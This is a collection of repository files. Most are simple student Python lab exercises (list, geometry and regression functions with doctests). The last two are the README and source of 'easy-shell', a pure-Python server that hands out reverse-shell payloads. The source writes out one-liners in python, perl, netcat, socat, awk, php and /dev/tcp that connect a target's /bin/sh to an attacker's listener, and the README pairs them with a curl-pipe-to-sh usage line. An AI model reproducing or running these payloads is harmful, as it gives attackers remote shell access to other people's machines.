sum3([7,8,19])\nprint(test)\ntest = sum3([102,231,590])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 6:\n\n\ndef rotate_left3(rotate:list):\n \"\"\"Takes a 3 elements list and returns a new list with the same elements but shifted to the left.\n >>>rotate([1,2,3])\n [2,3,1]\n >>>rotate([24,32,1])\n [32,1,24]\n \"\"\"\n if len(rotate) == 3:\n x = rotate[0]\n y = rotate[1]\n z = rotate[2]\n rotate[0] = y\n rotate[1] = z\n rotate[2] = x\n return rotate\n else:\n return 'List requires only 3 elements'\n\n\ntest = rotate_left3([1, 2, 3])\nprint(test)\ntest = rotate_left3([1, 2, 3, 4])\nprint(test)\ntest = rotate_left3([21, 104, 54])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 7:\n\n\ndef reverse3(reverse:list):\n \"\"\"Takes a 3 element list and swaps the first and last element.\n >>>reverse3([1,2,3])\n [3,2,1]\n >>>reverse3([12,61,45])\n [45,61,12]\n \"\"\"\n if len(reverse) == 3:\n x = reverse[0]\n y = reverse[2]\n reverse[0] = y\n reverse[2] = x\n return reverse\n else:\n return 'List requires 3 elements only'\n\n\ntest = reverse3([1, 2, 3])\nprint(test)\ntest = reverse3([3,6,2])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 8:\n\n\ndef max_end3(L:list):\n \"\"\"Compares the first and last element of the list and converts all the elements into the largest of the 2\n >>>max_end3([1,2,3])\n [3,3,3]\n >>>max_end3([12,1,9])\n [12,12,12]\n \"\"\"\n if len(L) ==3:\n if L[0] > L[2]:\n L[1] = L[0]\n L[2] = L[0]\n return L\n else:\n L[0] = L[2]\n L[1] = L[2]\n return L\n else:\n return 'List requires 3 elements only'\n\n\ntest = max_end3([1,2,3])\nprint(test)\ntest = max_end3([20,1,2])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 9:\n\n\ndef sum2(list1:list,list2:list):\n \"\"\"Takes the first 2 elements of 2 lists and adds them together if the 2 lists contain more then 1 element\n >>>sum2([1,2],[3,4])\n 4\n >>>sum2([1],[2,3])\n 0\n >>>sum2([5,12],[10,9])\n 15\n \"\"\"\n if len(list1) == 1:\n return 0\n if len(list2) == 1:\n return 0\n else:\n return list1[0] + list2[0]\n\n\ntest = sum2([1],[1,2])\nprint(test)\ntest = sum2([3,5],[6,2,4,8,2,12])\nprint(test)\ntest = sum2([315,32,15,61],[81,92,3,5])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 10:\n\n\ndef middle_way(list1:list,list2:list):\n \"\"\"Takes 2 lists and returns a new list containing the 2 middle elements\n >>>middle_way([5,4,6],[2,3,4])\n [4,3}\n >>>middle_way([6,21,31],[51,2,6])\n [21,2]\n \"\"\"\n if len(list1) >= 4:\n return 'List can not contain more then 3 elements'\n if len(list2) >= 4:\n return 'List can not contain more then 3 elements'\n return [list1[1],list2[1]]\n\n\ntest = middle_way([1,2,3],[3,2,1])\nprint(test)\ntest = middle_way([4,6,1],[4,9,0])\nprint(test)\ntest = middle_way([1,2,3,4],[1,2,3])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 11:\n\n\ndef make_ends(L:list):\n \"\"\"Returns a new list containing the first and last element of a list\n >>>make_ends([1,3,4,12,3])\n [1,3]\n >>>make_ends([31,64,68,345,29,889,12])\n [31,12]\n \"\"\"\n return [L[0],L[len(L)-1]]\n\n\ntest = make_ends([1,2,3])\nprint(test)\ntest = make_ends([2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,3])\nprint(test)\ntest = make_ends([12,413,61,69,350,65])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 12:\n\n\ndef has23(L:list):\n \"\"\"Returns true if a list contains 2 or 3 as one of their elements\n >>>has23([3,2,4,1])\n True\n >>>has23([2,4,5,6])\n True\n >>>has23([3,4,5,6])\n True\n >>>has23([6,7,8,9])\n False\n \"\"\"\n if 2 in L:\n return True\n if 3 in L:\n return True\n else:\n return False\n\n\ntest = has23([3,4,2,1])\nprint(test)\ntest = has23([1,1,1,1,2])\nprint(test)\ntest = has23([4,3,5,1,0])\nprint(test)\ntest = has23([1,4,5,6,7,8])\nprint(test)\n"
},
{
"alpha_fraction": 0.4637823700904846,
"alphanum_fraction": 0.5231071710586548,
"avg_line_length": 20.792856216430664,
"blob_id": "b9c6a7c4e9ec38b298b6ad5d963cc9964d2bc015",
"content_id": "886fbadf4b3b7e6ae67dfeb110d12356d65848fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3051,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 140,
"path": "/lab7.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1\n\ndef bakers_party(pastries:int, day:str):\n \"\"\"Returns if the bakers party is successful or not based on the day of the week and the number of pastries\n >>>bakers_party(39,'monday')\n False\n >>>bakers_party(63,'sunday')\n True\n >>>bakers_party(69,'tuesday')\n False\n >>>bakers_party(55,'friday')\n True\n \"\"\"\n weekday = ['monday', 'tuesday', 'wednesday', 'thursday']\n return (40 <= pastries <= 60) if day in weekday else (pastries <= 40)\n\n\ntest = bakers_party(40, 'monday')\nprint(test)\ntest = bakers_party(16, 'friday')\nprint(test)\ntest = bakers_party(64,'saturday')\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 2\n\ndef squirrel_play(temp:float, summer:bool):\n \"\"\" Returns if the squirrels go out and play depending on the temperature and if it is summer or not.\n >>>squirrel_play(75,False)\n True\n >>>squirrel_play(35,True)\n False\n \"\"\"\n return (60.0 <= temp <= 100) if summer else (60.0 <= temp <= 90)\n\n\ntest = squirrel_play(70, True)\nprint(test)\ntest = squirrel_play(34, False)\nprint(test)\ntest = squirrel_play(101, True)\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 3\n\ndef great_42(num1:int, num2:int):\n \"\"\"Returns true or false depending on if the 2 parameters are 42, have a sum of 42, or difference of 42.\n >>>great_42(42,1)\n True\n >>>great_42(32,10)\n True\n >>>great_42(43,1)\n True\n >>>great_42(1,2)\n False\n \"\"\"\n if num1 or num2 == 42:\n return True\n else:\n if num1+num2 == 42:\n return True\n if abs(num2-num1) == 42:\n return True\n else:\n return False\n\n\ntest = great_42(42, 1)\nprint(test)\ntest = great_42(32, 10)\nprint(test)\ntest = great_42(43, 1)\nprint(test)\ntest = great_42(0, 4)\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 4\ndef blackjack(a:int, b:int):\n \"\"\"Returns the variable closet to 21. However variables above 21 will return a 0.\n >>>blackjack(2,19)\n 19\n >>>blackjack(26,2)\n 2\n >>>blackjack(24,23)\n 0\n \"\"\"\n if b > 21:\n b = 0\n if a > 21:\n a = 0\n if a or b <= 21:\n if b <= a <= 21:\n return a\n elif a <= b <= 21:\n return b\n\ntest = blackjack(2, 55)\nprint(test)\ntest = blackjack(21, 22)\nprint(test)\ntest = blackjack(24, 23)\nprint(test)\n\nprint('----------------------------------------------------------')\n\n# exercise 5\ndef sum_uniques(a, b, c):\n \"\"\"Returns the sum of 3 unique numbers. If the number is the same it will not towards the summation.\n >>>sum_uniques(1, 2 ,3)\n 6\n >>>sum_uniques(5, 5, 4)\n 9\n >>>sum_uniques(2, 2, 2)\n 0\n \"\"\"\n if a == c == b:\n a = 0\n b = 0\n c = 0\n elif a == c:\n a = 0\n elif a == b:\n b = 0\n elif b == c:\n c = 0\n return a+b+c\n\n\ntest = sum_uniques(1, 10, 2)\nprint(test)\ntest = sum_uniques(3, 3, 3)\nprint(test)\ntest = sum_uniques(5, 5, 4)\nprint(test)\n"
},
{
"alpha_fraction": 0.4631892740726471,
"alphanum_fraction": 0.5600596070289612,
"avg_line_length": 22.97142791748047,
"blob_id": "0e16fbc63cb619e191c8c486d00bdc132ef9902b",
"content_id": "d1ba1bc0579cf9ccec680cb7f902b9fc2b4c7bd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3355,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 140,
"path": "/lab9.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1:\n\n\ndef count_evens(list:list):\n \"\"\"Counts the number of elements that are even\n >>>count_evens([1,3,5,7])\n 0\n >>>count_evens([2,4,6,8])\n 4\n >>>count_evens([9,4,0,8])\n 3\n \"\"\"\n count = 0\n for x in list:\n if x % 2 == 0:\n count += 1\n return count\n\n\ndef test_count_evens(expected:int, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', count_evens(l))\n if expected == count_evens(l):\n return 'Successful'\n else:\n return 'Failed'\n\n\ntest = test_count_evens(2,[1,2,3,4])\nprint(test)\ntest = test_count_evens(4,[2,4,6,8])\nprint(test)\ntest = test_count_evens(0,[1,3,5,7,9,11,13,15])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 2:\n\n\ndef big_diff(L:list):\n \"\"\"Finds the difference between the largest element and the smallest element of the list.\n >>>big_diff([1,2,3])\n 2\n >>>big_diff([10,11,12,16])\n 6\n \"\"\"\n x = 0\n y = 1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n for i in L:\n if x < i:\n x = i\n elif y > i:\n y = i\n return x - y\n\ndef test_big_diff(expected:int, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', big_diff(l))\n if expected == big_diff(l):\n return 'Successful'\n else:\n return 'Failed'\n\n\ntest = test_big_diff(9,[11,2,3])\nprint(test)\ntest = test_big_diff(2,[3,2,1])\nprint(test)\ntest = test_big_diff(5,[10,5,6,8])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 3:\n\n\ndef has22(list:list):\n \"\"\"If function has 2 2s side by side, returns true else false\n >>>has22([1,2,2,1])\n True\n >>>has22([1,2,3,42,3,4])\n False\n >>>has22([2,1,3,2,4,2,2])\n True\n \"\"\"\n for i in range(len(list)-1):\n if list[i] == 2:\n if list[i+1] == 2:\n return True\n return False\n\ndef test_has22(expected, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', has22(l))\n if expected == has22(l):\n return 'Successful'\n else:\n return 'Failed'\n\ntest = test_has22(False,[1,1,1,1,1,1,1,2])\nprint(test)\ntest = test_has22(False,[1,3,4,5,5,6,7,7,8])\nprint(test)\ntest = test_has22(True,[1,2,2,3,4,5])\nprint(test)\ntest = test_has22(True,[1,2,1,1,2,1,2,2])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 4:\n\n\ndef centered_average(L:list):\n \"\"\"Finds the average of the list consisting of all elements except the max and min.\n >>>centered_average([1,2,3,4])\n 2.5\n >>>centered_average([10,11,12,13])\n 11.5\n >>>centered_average([23,21,1,14,5])\n 13.3333333333333333333\n \"\"\"\n x = 0\n for i in L:\n x += i\n return (x - min(L) - max(L))/(len(L)-2)\n\ndef test_centered_average(expected:float, l:list):\n print('Testing count_evens', l)\n print('Expected Value:', expected, ', Actual Value:', centered_average(l))\n if expected == centered_average(l):\n return 'Successful'\n else:\n return 'Failed'\n\n\ntest = test_centered_average(2.5,[1,2,3,4])\nprint(test)\ntest = test_centered_average(15.0,[10,12,14,16,18,20])\nprint(test)\ntest = test_centered_average(8.2,[21,3,4,5,1,61,8])\nprint(test)"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.7261538505554199,
"avg_line_length": 24.076923370361328,
"blob_id": "73c1c2089da76827d6bc8db359cb84217c0c48c7",
"content_id": "6f297275833e6ca5480e03958ebf102af9200b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 13,
"path": "/lab3ex4.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "import math\n\ndef area_of_cone(height, radius):\n return math.pi*(radius)*math.sqrt(radius**2+height**2)\n\nsurface_area = area_of_cone(5,10)\nprint(surface_area)\nsurface_area = area_of_cone(5.0,10.0)\nprint(surface_area)\nsurface_area = area_of_cone(0,10)\nprint(surface_area)\nsurface_area = area_of_cone(5,0)\nprint(surface_area)"
},
{
"alpha_fraction": 0.5426945090293884,
"alphanum_fraction": 0.5597723126411438,
"avg_line_length": 17.821428298950195,
"blob_id": "895e7122161e5eca1accb38e8b4f7d3871cf7d79",
"content_id": "c0ce1ab4fffc40ed9362eff7d850e54123efcc28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1054,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 56,
"path": "/lab5.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# excerise 4\n\ndef repeat(s: str, n: int) -> str:\n \"\"\" Return s repeated n times; if n is negative, return the\n empty string.\n >>> repeat('yes', 4)\n 'yesyesyesyes'\n >>> repeat('no', 0)\n ''\n >>> repeat('no', -2)\n ''\n >>> repeat('yesnomaybe', 3)\n 'yesnomaybeyesnomaybeyesnomaybe'\n \"\"\"\n return s * n\n\n\nresult = repeat(\"yes\", 4)\nprint(result)\n\n\n# excersie 5\n\ndef total(s1: str, s2: str):\n \"\"\" Return the sum of the lengths of s1 and s2.\n >>> total('yes', 'no')\n 5\n >>> total('yes', '')\n 3\n >>> total('YES!!!!', 'Noooooo')\n 14\n \"\"\"\n return len(s1 + s2)\n\n\nresult = total('YES!!!!', 'Noooooo')\nprint(result)\n\n\n# excersise 6\n\ndef replicate(s: str):\n \"\"\"Returns a new string containing the original string copied by a number of times determined by the number of\n characters in the original string\n >>> replicate('no')\n 'nono'\n >>> replicate('loom')\n 'loomloomloomloom'\n >>> replicate('ma')\n 'mama'\n \"\"\"\n return len(s) * s\n\n\nresult = replicate('yes')\nprint(result)\n"
},
{
"alpha_fraction": 0.6366559267044067,
"alphanum_fraction": 0.6752411723136902,
"avg_line_length": 18.5,
"blob_id": "dc0312043e1d6b80eab746f76e1557005ec0efb5",
"content_id": "65cc2bc6aebc915188817957391d94288f769c37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 16,
"path": "/lab3ex1.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "import math\n\ndef area_of_disk(radius):\n return math.pi * radius ** 2\n\ndef area_of_ring(outer,inner):\n return area_of_disk(outer) - area_of_disk(inner)\n\narea = area_of_disk(5)\nprint(area)\narea = area_of_disk(5.0)\nprint(area)\narea = area_of_ring(10, 5)\nprint(area)\narea = area_of_ring(10.0, 5.0)\nprint(area)"
},
{
"alpha_fraction": 0.6223776340484619,
"alphanum_fraction": 0.7226107120513916,
"avg_line_length": 27.53333282470703,
"blob_id": "36433d1fe8e344e0ed5774c8f2734f0ae7e43431",
"content_id": "371eaa5a9cf8df63571e967c84297f7400a439e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 15,
"path": "/lab3ex3.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "\n\ndef accumulated_amount(principal, rate, n, time):\n return principal*(1+(rate/n))**(n*time)\n\namount = accumulated_amount(10,2,1,2)\nprint(amount)\namount = accumulated_amount(10.0,2.0,1.0,2.0)\nprint(amount)\namount = accumulated_amount(1500,0.3,2,2)\nprint(amount)\namount = accumulated_amount(1500.0,0.3,2.0,2.0)\nprint(amount)\namount = accumulated_amount(0,2,1,2)\nprint(amount)\namount = accumulated_amount(10,0,1,2)\nprint(amount)"
},
{
"alpha_fraction": 0.4937998354434967,
"alphanum_fraction": 0.5513728857040405,
"avg_line_length": 28.54054069519043,
"blob_id": "cdc1945984c1fa79501920e7fdefbd8974965ccf",
"content_id": "067495b07e68223b39be4c0db152daaadc4d6441",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2258,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 74,
"path": "/lab12-linearRegression.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# ECOR 1051 Lab 12 File: lab12-linearRegression.py\r\n\r\nfrom typing import Set, Tuple\r\n# See Practical Programming, Chapter 8, section Type Annotations For Lists,\r\n# and Chapter 11, first paragraph of section Creating New Type Annotations. \r\n\r\ndef get_points() -> Set[Tuple[float, float]]:\r\n \"\"\"Return a set of (x, y) points.\r\n >>> get_points()\r\n {(3.5, 12.5), (2.0, 8.0), (1.0, 5.0)}\r\n >>> samples = get_points()\r\n\r\n >>> len(samples) # How many tuples (points) are in the set?\r\n 3\r\n >>> samples\r\n {(3.5, 12.5), (2.0, 8.0), (1.0, 5.0)}\r\n \"\"\"\r\n return {(1.0, 5.0), (2.0, 8.0), (3.5, 12.5)}\r\n\r\n\r\ndef fit_line_to_points(points:Set[Tuple[float,float]]) -> Tuple[float,float]:\r\n \"\"\"Takes a set of x,y coordinates and returns the gradient and y intersect of the line of best fit\r\n >>>fit_line_to_points({(3.5, 12.5), (2.0, 8.0), (1.0, 5.0)})\r\n 3.0, 2.0\r\n >>>fit_line_to_points({(4.6,4.3,),(7.8,1.5)})\r\n -0.8749999999999962, 8.324999999999974\r\n \"\"\"\r\n sumx = 0\r\n sumy = 0\r\n n = 0\r\n sumxy = 0\r\n sumxx = 0\r\n for i in points:\r\n sumx += i[0]\r\n sumy += i[1]\r\n n += 1\r\n sumxy += i[0]*i[1]\r\n sumxx += i[0]**2\r\n m = (sumx * sumy - n * sumxy)/(sumx * sumx - n * sumxx)\r\n c = (sumx * sumxy - sumxx * sumy)/(sumx * sumx - n * sumxx)\r\n return m, c\r\n\r\n\r\ndef best_line(file:str) -> str:\r\n \"\"\"Returns the equation of the line of best fit using data read from a file\"\"\"\r\n x = input(\"Input file name:\")\r\n (m, c) = fit_line_to_points(read_points(x))\r\n final = 'best line is y = ', str(m), 'x + ', str(c)\r\n return ''.join(final)\r\n\r\n\r\ndef read_and_print_lines() -> None:\r\n \"\"\"Reads and prints data from a separate file\"\"\"\r\n infile = open('lab12-data.txt', 'r')\r\n for line in infile:\r\n print(line)\r\n infile.close()\r\n\r\n\r\ndef read_points(filename:str) -> Set[Tuple[float,float]]:\r\n \"\"\"Reads data from a separate file and converts them into 2 float points\"\"\"\r\n infile = open(filename, 'r')\r\n points = {1}\r\n for line in infile:\r\n s = line.split()\r\n nums = (float(s[0]), float(s[1]))\r\n points.add(nums)\r\n infile.close()\r\n points.remove(1)\r\n return points\r\n\r\n\r\ntest = best_line('lab12-data.txt')\r\nprint(test)"
},
{
"alpha_fraction": 0.459090918302536,
"alphanum_fraction": 0.6176136136054993,
"avg_line_length": 20.463415145874023,
"blob_id": "5ed7c46d720069d21555655f233a4bc07e4bf37a",
"content_id": "e5377b9505231160b61f6bf37f0283623af8954d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1760,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 82,
"path": "/lab4.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "import math\n\n\n# excersise 1\n\ndef area_of_disk(radius):\n \"\"\"Return the area of a disk with the specified non-negative radius\n >>> area_of_disk(5)\n 78.53981633974483\n >>> area_of_disk(11)\n 380.132711084365\n >>>area_of_disk(0)\n 0\n \"\"\"\n return math.pi * radius ** 2\n\n\narea = area_of_disk(5)\nprint(area)\narea = area_of_disk(5.0)\nprint(area)\n\n\n# excersise 2\n\ndef distance(x1, y1, x2, y2):\n \"\"\"Return the distance between 2 points with the difference between the x values and the y values of the 2 points\n >>> distance(4,5,1,1)\n 5.0\n >>> distance(3,2,4,6)\n 4.123105625617661\n >>> distance(6,7,1,2)\n 7.0710678118654755\n >>>distance(1,1,0,0)\n 1.4142135623730951\n \"\"\"\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n\ntest = distance(5, 4, 0, 0)\nprint(test)\n\n\n# excersise 3\n\ndef area_of_circle(x1, y1, x2, y2):\n \"\"\"Returns the area of a circle with a radius given by the distance between 2 points.\n >>>area_of_circle(4,5,1,1)\n 78.53981633974483\n >>>area_of_circle(1,2,3,4)\n 25.132741228718345\n >>>area_of_circle(6,7,1,2)\n 157.07963267948966\n >>>area_of_circle(1,1,1,1)\n 0\n \"\"\"\n return math.pi * ((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\n\ntest = area_of_circle(8, 2, 7, 1)\nprint(test)\n\n\n# excersise 4\n\ndef height(ladder, angle):\n \"\"\" Returns the vertical height that the ladder covers when placed against the wall using the length of the ladder\n in meters and the angle from the floor to the ladder in degrees.\n >>>height(math.sqrt(2),45)\n 1\n >>>height(1.3,34)\n 0.726950774511971\n >>>height(2.4,66)\n 2.192509098342242\n >>>height(1.9,87)\n 1.8973961160336903\n \"\"\"\n return ladder * math.sin(math.radians(angle))\n\n\ntest = height(1.3, 57)\nprint(test)\n"
},
{
"alpha_fraction": 0.413654625415802,
"alphanum_fraction": 0.4538152515888214,
"avg_line_length": 12.1578950881958,
"blob_id": "809b37a418fbbe842c479a1f6e1e576bdbf06844",
"content_id": "177c7dab18921673bc31b617631280e7564c06c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 249,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 19,
"path": "/lab11.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 2:\n\n\ndef average(l:list) -> list:\n total = 0\n for i in l:\n for x in i:\n total += x\n avg = total/3\n print(avg)\n \n return l\n\n\ntest = average([(1, 2, 3), (4, 5, 6)])\nprint(test)\n\n\n# exercise 4:"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.7298136353492737,
"avg_line_length": 25.75,
"blob_id": "bd7ffb94cbb945910e1175b4ac7de80c64b2a490",
"content_id": "0e39fc8a851f49b59f44721eb429e28272fe138f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 12,
"path": "/lab3ex2.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "\n\nLITRES_PER_GALLON = 4.54609\nKMS_PER_MILE = 1.60934\n\ndef convert_to_litres_per_100_km(mpg):\n return (mpg*KMS_PER_MILE)/(LITRES_PER_GALLON*100)\n\nlp100km = convert_to_litres_per_100_km(32)\nprint(lp100km)\nlp100km = convert_to_litres_per_100_km(0)\nprint(lp100km)\nlp100km = convert_to_litres_per_100_km(32.0)\nprint(lp100km)"
}
] | 13 |
linuxl0s3r/easy-shell
|
https://github.com/linuxl0s3r/easy-shell
|
a7a68386295faacc7b1bdb65b6594c6d437cc8ba
|
26fe0638820c996825ff381454bcc8f84d022667
|
151925a52f21f3c92758d84834429773b335a05f
|
refs/heads/main
| 2023-01-30T15:13:53.780198 | 2020-12-13T14:27:35 | 2020-12-13T14:27:35 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6659107804298401,
"alphanum_fraction": 0.7052153944969177,
"avg_line_length": 21.066667556762695,
"blob_id": "edc7bad82968d66af4a7c60cc2db45dcd9800380",
"content_id": "4de0615c0bf4a55bfe6b4485534eaa6fe46dad28",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1323,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 60,
"path": "/README.md",
"repo_name": "linuxl0s3r/easy-shell",
"src_encoding": "UTF-8",
"text": "# easy-shell\n\nA pure Python script to easily get a reverse shell.\n\n### How it works?\n\nAfter sending a request, it generates a payload with different commands available to get a reverse shell (python, perl, awk, and more).\n\n### Example\n\n##### Attacker machine\n```\n$ whoami\nattacker\n\n$ nc -l 8080\nsh-4.4$ whoami\ncentos\nsh-4.4$ pwd\n/home/centos\n```\n\n##### Target machine\n```\n$ whoami\ntarget\n\n$ curl http://easy-shell.xyz/192.168.0.52:8080 | sh\n```\n\n### Running the server\n\nEdit the following lines on ```easy_shell.py``` according to your needs:\n\n```\nPORT = 8080\nDOMAIN = \"http://127.0.0.1:{}\".format(str(PORT))\n\nHTTPS = False\nKEY_FILE = \"keyfile.key\"\nCERT_FILE = \"certfile.cert\"\n```\n\nIf you want to run it over HTTPS, execute the following commands:\n\n```\n$ openssl genrsa 2048 > keyfile.key && chmod 400 keyfile.key\n$ openssl req -new -x509 -nodes -sha256 -days 365 -key keyfile.key -out certfile.cert\n```\n\n### Used modules\n\n- [ssl](https://docs.python.org/3/library/ssl.html#module-ssl)\n- [http.server](https://docs.python.org/3/library/http.server.html#module-http.server)\n- [socketserver](https://docs.python.org/3/library/socketserver.html#module-socketserver)\n- [urllib.parse](https://docs.python.org/3/library/urllib.parse.html#module-urllib.parse)\n\n### License\n\nThis project is licensed under the 3-Clause BSD License."
},
{
"alpha_fraction": 0.6316016316413879,
"alphanum_fraction": 0.6456132531166077,
"avg_line_length": 38.99137878417969,
"blob_id": "493db3b4f1c7bea45fc22a87247ce51c61a5eede",
"content_id": "c8e40aee6923e993ca48445ed57cfd305e5ea002",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4639,
"license_type": "permissive",
"max_line_length": 268,
"num_lines": 116,
"path": "/easy_shell.py",
"repo_name": "linuxl0s3r/easy-shell",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright 2020 Cristian Souza\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright\nnotice, this list of conditions and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution.\n\n3. Neither the name of the copyright holder nor the names of its\ncontributors may be used to endorse or promote products derived from\nthis software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\nHOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED\nTO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\nPROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport ssl\nimport http.server\nimport socketserver\nfrom urllib.parse import urlparse\n\nPORT = 8080\nDOMAIN = \"http://127.0.0.1:{}\".format(PORT)\n\nHTTPS = False\nKEY_FILE = \"keyfile.key\" # openssl genrsa 2048 > keyfile.key && chmod 400 keyfile.key\nCERT_FILE = \"certfile.cert\" # openssl req -new -x509 -nodes -sha256 -days 365 -key keyfile.key -out certfile.cert\n\nUSAGE = \"\"\"# Usage\n# Attacker: nc -l port\n# Target: curl {}/ip:port | sh\\n\"\"\".format(DOMAIN)\n\n\ndef is_valid(host_port):\n \"\"\"Checks if there are a host and a port.\"\"\"\n\n if len(host_port.split(\":\")) != 2:\n return False\n\n return True\n\ndef generate_sh(host_port):\n \"\"\"Generates different payloads.\"\"\"\n\n host, port = host_port.split(\":\")\n\n commands = {\n \"python\" : \"python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\\\"{}\\\", {})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\".format(host, port),\n \"perl\" : \"perl -e 'use Socket;$i=\\\"{}\\\";$p={};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};'\".format(host, port),\n \"nc\" : \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f\".format(host, port),\n \"socat\" : \"socat tcp-connect:{}:{} system:/bin/sh\".format(host, port),\n \"awk\" : \"awk 'BEGIN {{s = \\\"/inet/tcp/0/{}/{}\\\"; while(42) {{ do{{ printf \\\"$ \\\" |& s; s |& getline c; if(c){{ while ((c |& getline) > 0) print $0 |& s; close(c); }} }} while(c != \\\"exit\\\") close(s); }}}}' /dev/null\".format(host, port),\n \"php\" : \"php -r '$sock=fsockopen(\\\"{}\\\",{});exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\".format(host, port),\n \"sh\" : \"/bin/sh -i >& /dev/tcp/{}/{} 0>&1\".format(host, port)\n }\n\n payload = \"\"\"# Usage\n# Attacker: nc -l {2}\n# Target: curl {0}/{1}:{2} | sh\\n\"\"\".format(DOMAIN, host, port)\n\n for key, value in commands.items():\n # 